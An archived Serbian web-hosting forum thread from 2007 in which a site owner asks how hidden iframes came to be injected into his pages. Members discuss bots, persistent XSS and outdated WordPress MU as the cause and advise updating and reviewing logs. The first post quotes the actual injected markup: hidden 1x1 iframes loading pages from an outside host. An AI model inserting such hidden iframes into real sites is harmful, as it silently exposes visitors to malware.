Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima |
|
Alati teme | Način prikaza |
05. 06. 2007. | #1 |
profesionalac
Professional
|
Hackovanje i <iframe>
Nekoliko mojih sajtova je hakovano tako sto je ubacen skriveni iframe iframe tag a da nije bilo promene ostalog sadrzaja, sa namerom da sto duze ostane neprimecen, dok mi se desavalo i da obrisu celu stranicu i ostave iframe tagove.
Google me je konatktirao da je na jednoj stranici maliciozni kod koji posetioce moze da zarazi nekim virusom. Evo koda koji je ostao na jednoj od stranica: Kôd:
-->--><!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ --> |
05. 06. 2007. | #2 |
član
Certified
Datum učlanjenja: 07.08.2005
Poruke: 67
Hvala: 15
0 "Hvala" u 0 poruka
|
Mislim da je u pitanju bot, koji ima pristup fajlovima na serveru i izmenama istih. Imao sam slučaj kod jednog klijenta da bot isto tako ubaci deo koda u sve stranice koje sadrže "index" u nazivu, čak i one neaktivne.
__________________
Online prodavnica rukotvorina |
05. 06. 2007. | #3 |
Psychedelictrance freak
Wrote a book
|
Cini mi se da je u tvom slucaju bot, a kako su ubacili ... hm ... ne mogu tacno reci dok ne vidim stranicu ali verovatno imas neki "persistent XSS" propust.
__________________
Testiranje bezbednosti web aplikacija |
05. 06. 2007. | #4 |
Nikola Denić
Sir Write-a-Lot
|
ako koristis smarty pogledaj da li nije malo zastareo
__________________
Do not ask yourself what the world needs. Ask yourself what makes you come alive, and then go do that. Because what the world needs is people who have come alive |
05. 06. 2007. | #5 |
Milan Cvejic
Wrote a book
|
Ivane, XSS se moze manifestovati samo uz akcije posetilaca.
Dok kao sto vidimo ovde, njemu je neko dodao kod na stranu Da lici na nekog bot-a, ali tu je sam kriv zato sto ne vodi racuna o greskama koje software koji on koristi mozda ima. Da nisi mozda koristio OScommerce?!? Pozdrav.
__________________
http://weevify.com Poslednja izmena od LiquidBrain : 05. 06. 2007. u 15:01. |
05. 06. 2007. | #6 |
Ivan Dilber
Sir Write-a-Lot
|
mislim da je postojao ovakav problem sa starijim verzijama Wordpressa, propust koji su botovi koristili da dodaju viruse.. taj se problem resavao apgrejdom..
inace, pogledaj apache log fajlove i pokusaj da snimis trenutak kad se prvi put pojavljuju zahtevi za te ifrejmove, a onda pogledaj par zahteva ispred toga ko je sta pozivao... trebalo bi da tako moze da se nasluti nacin kako su te uhakovali...
__________________
Leadership is the art of getting people to want to do what you know must be done. |
05. 06. 2007. | #7 |
Psychedelictrance freak
Wrote a book
|
@LiquidBrain
Malo ti je nejasan zakljucak, XSS se manifestuje prilikom posete korisnika ali takodje moze da postoji na stranici kao npr neki komentar na nekom busnom blog enginu ... zato sam i napisao "persistent XSS". Mada moze da bude i bilo sta drugo ali mi je ovaj tip napada prvi pao napamet zbog "bot" pristupa. O kom software-u je rec ?
__________________
Testiranje bezbednosti web aplikacija Poslednja izmena od Ivan : 05. 06. 2007. u 17:28. |
06. 06. 2007. | #8 |
Designer guy
Wrote a book
|
Isto (ili slično) se desilo i gomili drugih ljudi, pogledaj na Sheinom blogu. U glavnom došli su do zaključka da se dešava na Dreamhostovim serverima i Wordpress blogovima (ne nužno zajedno).
|
06. 06. 2007. | #9 |
profesionalac
Professional
|
Softver je WordPress MU. Jeste, verzija MU-a jeste zastarela, nisma koristio taj softver i eto. Mada su mi hakovali i sajtove sa cistim php i html fajlovima, bez ikakvog CMS-a.
Sad cu da update-ujem software pa ce vidimo kom opanci ... |
06. 06. 2007. | #10 |
Direktor Kombinata
Invented the damn thing
Datum učlanjenja: 07.06.2005
Poruke: 2.669
Hvala: 44
119 "Hvala" u 64 poruka
|
Bitno je da znaš kako su "ušli", fajlovi koje su hakovali su nebitni.
Možeš upasti na jednom mestu i izmeniti milion fajlova. Upadneš kroz WP MU na primer, projuriš sve fajlove sa .html ekstenzijom i ako je pisanje moguće dodaš šta god hoćeš u njih. Ulaz - 1, izmenjenih fajlova - mlogo Zato uglavnom dajem savete ljudima da izbegavaju free skripte. Treba da ih nadlgedas i krpiš non stop ako ne želiš da navučeš neku bedu. Komercijalni i custom CMS-ovi su manje popularni i u nekim slučajevima dobro napisani tako da si manje ugrožen. No, koliko para toliko muzike
__________________
activeCollab - Project Management and Collaboration Tool iz domaće kuhinje | area51.rs - Blog Poslednja izmena od Ilija Studen : 06. 06. 2007. u 11:17. |
|
|
Slične teme | ||||
Tema | Početna poruka teme | Forum | Odgovori | Poslednja poruka |
Referenca na div koji se nalazi u iframe-u | centaur | (X)HTML, JavaScript, DHTML, XML, CSS | 10 | 10. 09. 2008. 18:33 |
[JS] HTML kod IFRAME-a | Nemanja Avramović | Sva početnička pitanja | 6 | 14. 03. 2008. 20:50 |
Iframe i JS | ivanhoe | (X)HTML, JavaScript, DHTML, XML, CSS | 5 | 19. 12. 2006. 22:45 |
cross-domain scripting i iframe | ivanhoe | (X)HTML, JavaScript, DHTML, XML, CSS | 0 | 06. 05. 2006. 01:12 |
javascript, iframe i Opera | ivanhoe | (X)HTML, JavaScript, DHTML, XML, CSS | 2 | 28. 04. 2006. 14:21 |